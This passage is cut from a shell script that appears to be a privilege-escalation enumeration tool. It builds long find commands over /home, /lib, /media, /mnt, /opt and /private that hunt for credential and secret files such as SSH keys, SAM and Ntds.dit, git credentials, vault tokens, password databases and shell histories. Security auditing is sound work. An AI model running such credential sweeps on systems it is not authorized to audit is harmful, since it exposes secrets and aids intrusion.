-name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \"*knockd*\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \"ssh*config\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"sess_*\" -o -name \"*.crt\" -o -name \"printers.xml\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name 